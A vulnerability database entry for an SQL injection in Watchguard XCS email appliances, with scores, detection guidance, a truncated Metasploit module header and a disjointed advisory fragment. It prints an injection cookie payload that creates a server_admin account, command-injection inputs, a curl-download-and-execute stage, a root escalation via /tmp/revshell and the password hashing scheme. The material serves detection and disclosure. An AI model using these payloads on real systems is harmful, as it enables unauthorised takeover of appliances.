CVE-2015-5452
Published: 2015-07-08
Priority: P3 · 54 · high
CVSS 2.0 base score: 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 3.42% (87.4th percentile)
SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as demonstrated by a request to borderpost/imp/compose.php3.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| watchguard | xcs | — | — |
| watchguard | xcs | — | — |
Detection & IOCs (extracted from sources)
Cookie IOC: sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--
Detection guidance:
- Detect SQLi exploitation attempts via the 'sid' cookie on /borderpost/imp/compose.php3 — look for SQL metacharacters (single quote, semicolon, INSERT, --) in the sid cookie value.
- A vulnerable host will return the string 'unterminated quoted string' in the HTTP response body when probed with sid=1' — use this as a fingerprint for the check.
- Detect command injection exploitation via GET requests to /ADMIN/mailqueue.spl with the 'id' parameter containing a leading semicolon (e.g., id=;id or id=;/usr/local/sbin/curl).
- Successful command injection as 'nobody' (uid=65534) can be confirmed by the string 'uid=65534' appearing in the HTTP response body.
- Monitor for outbound curl requests from the appliance to external hosts (curl -k) followed by chmod +x and execution of a binary dropped in /tmp — indicative of the payload delivery stage.
- Alert on INSERT SQL statements injected into the sid cookie targeting the sds_users table, particularly inserting a user with priv_level='server_admin'.
- The XCS password hash uses a known salting scheme: MD5('BorderWare ' + password + ' some other random (9) stuff'), then MD5(password + first_hash). Detect or crack hashes using this scheme.
Notes:
- The exploit requires SSL (HTTPS on port 443) to communicate with the target appliance.
- The Metasploit module targets a 64-bit BSD platform (ARCH_X86_64); the payload must be a native BSD payload or generation will fail.
- The command injection executes as the 'nobody' user (uid=65534), not root — privilege escalation is a separate step (e.g., via a cron job running /tmp/revshell as root).
- The fix is Build 150522; only Watchguard XCS versions 9.2 and 10.0 prior to this build are affected.
No detection rules found.
Exploit-DB: Watchguard XCS - Remote Command Execution (Metasploit)
Source: exploitdb · 2015-09-28 · CVE-2015-5453
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Excerpt only: the source page cuts the module off after 'License', and the
# lines between the class declaration and 'Name' (module rank and mixin
# includes) were lost in extraction. The surviving metadata is kept verbatim.
class Metasploit4 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Watchguard XCS Remote Command Execution',
      'Description' => %q{
        This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
        appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
        remote attacker may insert a valid web user into the appliance database, and get access
        to the web interface. On the other hand, a vulnerability in the web interface allows the
        attacker to inject operating system commands as the 'nobody' user.
      },
      'Author'      =>
        [
          'Daniel Jensen' # discovery and Metasploit module
        ],
      'License'  # excerpt ends here in the source
```
Exploit-DB: Watchguard XCS 10.0 - Multiple Vulnerabilities
Source: exploitdb · 2015-06-30 · CVE-2015-5452
---
[advisory ASCII-art banner]
presents..
Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS
/var/tmp/badqids
The executable "/tmp/revshell" will be executed within three minutes by the root user.
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/132498/Watchguard-XCS-10.0-SQL-Injection-Command-Execution.html
- http://packetstormsecurity.com/files/133721/Watchguard-XCS-Remote-Command-Execution.html
- http://www.rapid7.com/db/modules/exploit/freebsd/http/watchguard_cmd_exec
- http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
- http://www.securityfocus.com/bid/75516
- http://www.watchguard.com/support/release-notes/xcs/10/en-US/EN_Release_Notes_XCS_v10_0_Security_Hotfix/EN_Release_Notes_XCS_v10_0_Security_Hotfix.pdf
- http://www.watchguard.com/support/release-notes/xcs/9/en-US/EN_ReleaseNotes_XCS_9_2_Security_Hotfix/EN_Release_Notes_XCS_v9_2_Security_Hotfix.pdf
- https://www.exploit-db.com/exploits/38346/